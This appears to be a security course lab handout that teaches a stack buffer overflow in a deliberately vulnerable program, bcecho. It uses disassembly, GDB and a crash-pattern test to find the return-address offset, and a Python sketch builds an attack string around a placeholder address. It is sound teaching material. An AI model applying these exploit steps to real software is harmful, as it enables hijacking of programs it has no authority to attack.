If you update your VM according to the latest version of this week's
instructions, you'll get a copy of bcecho in /src:

% cd /src
% sudo rm -f Makefile bcvi.c bcecho.c
% sudo wget http://www-users.cselabs.umn.edu/classes/Fall-2017/csci5271/ha1/v1.1/{Makefile,bcvi.c,bcecho.c}
% sudo make all bcecho
% sudo make install
% bcvi /dev/null

The key code in bcecho.c is the function print_arg, which is called
from main:

% cat bcecho.c

We also have our own implementation of strlcpy(), since it's not part
of the standard library. The print_arg function performs an unneeded
copy, and the computation of the size is a bit crazy. What does that
formula work out to be?

If we're going to exploit this, we should figure out where in the
attack string to put the value that will overwrite the return
address. We'll demo three approaches:

* Disassembly

To see the binary code of the executable in a somewhat readable form,
use:

% objdump -dS bcecho | less

"-d" says to disassemble, and "-S" says to interleave the source code
if it's available. The pager program "less" will let us conveniently
navigate in and search in the results. (You could also redirect to a
file and then use your favorite text editor.) Search for "print_arg"
(using the "/" command in less) to find the relevant code here:

08048520 <print_arg>:

void print_arg(char *str) {
 8048520:  55                    push   %ebp
 8048521:  89 e5                 mov    %esp,%ebp
 8048523:  83 ec 28              sub    $0x28,%esp
    char buf[20];
    int len;
    int buf_sz = (sizeof(buf) - sizeof(NULL)) * sizeof(char *);
 8048526:  c7 45 f4 40 00 00 00  movl   $0x40,-0xc(%ebp)
    len = strlcpy(buf, str, buf_sz);
 804852d:  8b 45 f4              mov    -0xc(%ebp),%eax
 8048530:  50                    push   %eax
 8048531:  ff 75 08              pushl  0x8(%ebp)
 8048534:  8d 45 dc              lea    -0x24(%ebp),%eax
 8048537:  50                    push   %eax
 8048538:  e8 5e ff ff ff        call   804849b <strlcpy>

The move on '526 is setting up buf_sz: we see it's 0x40 = 64. Then it
pushes the arguments to strlcpy in reverse order. buf_sz is pushed
first, followed by str (0x8(%ebp) is the first argument), and finally
buf.
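
As a quick check on the 0x40 seen in the disassembly, the size formula
can be worked through by hand. The sketch below is not part of the
course materials; it assumes a 32-bit x86 build in which sizeof(NULL)
and sizeof(char *) are both 4 bytes, and the constant names are made
up for illustration.

```python
# Assumed sizes for a 32-bit x86 build (assumptions, not read from the binary).
SIZEOF_BUF = 20       # char buf[20]
SIZEOF_NULL = 4       # sizeof(NULL), assuming NULL is pointer-sized
SIZEOF_CHAR_PTR = 4   # sizeof(char *)

# Same shape as the expression in print_arg.
buf_sz = (SIZEOF_BUF - SIZEOF_NULL) * SIZEOF_CHAR_PTR

# How far the size limit passed to strlcpy extends past the real buffer.
overrun = buf_sz - SIZEOF_BUF

print(hex(buf_sz), buf_sz)  # 0x40 64
print(overrun)              # 44
```

Under those assumptions the limit handed to strlcpy is 64 bytes for a
20-byte buffer, which is what makes the overflow possible.
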
There's no stack slot holding the location of buf, but the code
generates a pointer to it using "lea", so we can see that the start of
the array is at an offset of -0x24 from %ebp. The return address is at
0x4(%ebp) (in between the first argument and the saved old %ebp at
offset 0), so the distance from the start of the buffer to the
location that will overwrite the return address is
0x24 + 4 = 0x28 = 40.

* GDB

To run the program under a debugger, use:

% gdb --args ./bcecho Hello

The "--args" option says that all the remaining command-line arguments
are arguments to the program, rather than to GDB.

(gdb) b print_arg
Breakpoint 1 at 0x8048539: file bcecho.c, line 40.
(gdb) run
Starting program: /src/bcecho Hello

Breakpoint 1, print_arg (str=0xffffd8ff "Hello") at bcecho.c:40
40          int buf_sz = (sizeof(buf) - sizeof(NULL)) * sizeof(char *);
(gdb) n
41          len = strlcpy(buf, str, buf_sz);
(gdb) p buf_sz
$1 = 64
(gdb) p &buf
$2 = (char (*)[20]) 0xffffd6e4
(gdb) info frame
Stack level 0, frame at 0xffffd710:
 eip = 0x8048540 in print_arg (bcecho.c:41); saved eip = 0x80485d3
 called by frame at 0xffffd740
 source language c.
 Arglist at 0xffffd708, args: str=0xffffd8ff "Hello"
 Locals at 0xffffd708, Previous frame's sp is 0xffffd710
 Saved registers:
  ebp at 0xffffd708, eip at 0xffffd70c

The location of the saved return address is what GDB calls the saved
EIP: the "eip at 0xffffd70c" entry under "Saved registers". (The
"saved eip = 0x80485d3" on the second line is the return address
value itself, not where it is stored.) You can also get GDB to do the
math for you:

(gdb) p 0xffffd70c - (int)&buf
$3 = 40

* Experimentation

Another way to explore buffer overflows is to supply different data
and see what happens.
For instance, you can trigger an overflow using a pattern of data
that you'll recognize later:

% ./bcecho AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN
Segmentation fault (core dumped)

Even without GDB, you can get some basic information about the crash,
because the kernel on this system records it:

% dmesg -T | tail -1
[Tue Sep 19 16:46:25 2017] bcecho[1525]: segfault at 4b4b4b4b ip 000000004b4b4b4b sp 00000000ffffd640 error 14 in libc-2.23.so[f7e13000+1b0000]

0x4b4b4b4b doesn't look like a valid code address. What letter does
0x4b code for in ASCII?

% ascii 0x4b
ASCII 4/11 is decimal 075, hex 4b, octal 113, bits 01001011: prints as `K'
Official name: Majuscule K
Other names: Capital K, Uppercase K

K is the 11th letter, so "KKKK" starts 10 * 4 = 40 bytes into the
string, which agrees with the offset found by the other two
approaches. To make an attack, the "KKKK" in the above string is what
we'd replace with the address we want to jump to.
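
The letter-matching step can also be done mechanically. Below is a
minimal sketch in Python, not part of the course materials: it
rebuilds the same four-letter pattern, looks up where the faulting
value from dmesg falls in it, and lays out an attack string with a
4-byte address at that offset. The helper names make_pattern and
offset_of are hypothetical, and TARGET is a placeholder value chosen
for illustration, not a real address in bcecho.

```python
import string
import struct

def make_pattern(groups=14):
    """Return 'AAAABBBB...' built from the first `groups` uppercase letters."""
    return "".join(letter * 4 for letter in string.ascii_uppercase[:groups])

def offset_of(fault_addr, pattern):
    """Return the index in `pattern` of the 4 bytes that became `fault_addr`."""
    # x86 is little-endian, so unpack the address in that byte order.
    needle = struct.pack("<I", fault_addr).decode("ascii")
    return pattern.index(needle)

pattern = make_pattern()                 # same string as used on the command line
offset = offset_of(0x4B4B4B4B, pattern)  # value reported by dmesg
print(offset)                            # 40

# Placeholder only (assumption): substitute the address you want to jump to.
TARGET = 0xDEADBEEF

# Filler up to the return address slot, then the address in little-endian order.
payload = b"A" * offset + struct.pack("<I", TARGET)
print(len(payload))                      # 44
```

Because every letter is repeated four times, the byte order of the
faulting value doesn't matter for the lookup here; with a pattern of
distinct bytes it would.
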